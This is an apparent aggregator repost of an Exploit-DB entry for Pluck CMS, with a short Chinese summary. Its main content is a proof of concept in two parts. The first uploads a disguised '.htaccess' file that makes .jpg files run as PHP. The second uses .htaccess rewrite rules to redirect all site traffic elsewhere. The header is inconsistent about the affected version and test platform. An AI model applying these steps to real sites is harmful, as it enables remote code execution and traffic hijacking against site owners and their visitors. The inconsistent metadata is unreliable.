[webapps] Pluck 4.7.7-dev2 - PHP Code Execution
Pluck CMS 4.7.7-dev2 存在 PHP 代码执行漏洞,攻击者可通过上传伪装为图片的 .htaccess 文件,在目标目录中执行恶意代码或重定向流量。 2025-12-8 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:0 收藏
Pluck CMS 4.7.7-dev2 存在 PHP 代码执行漏洞,攻击者可通过上传伪装为图片的 .htaccess 文件,在目标目录中执行恶意代码或重定向流量。 2025-12-8 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:0 收藏
# Exploit Title: Pluck 4.7.7-dev2 - PHP Code Execution
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/pluck-cms/pluck
# Software Link: https://github.com/pluck-cms/pluck
# Version: 4.74-dev5
# Tested on: Ubuntu Windows
# CVE : CVE-2018-11736
PoC:
1)
1. Log in to the Pluck admin panel.\n
2. Navigate to the 'Manage Images' section at http://pluck1/admin.php?action=images.\n
3. Upload a file named '.htaccess' with the content-type 'image/jpeg' containing 'AddType application/x-httpd-php .jpg'.\n
4. Access the target directory (e.g., http://pluck1/images/test.jpg) to execute PHP code with the .jpg extension.
2)
.htaccess content:
RewriteEngine On
RewriteRule .* http://www.baidu.com/ [R,L]
[Replace Your Domain Name]
文章来源: https://www.exploit-db.com/exploits/52460
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh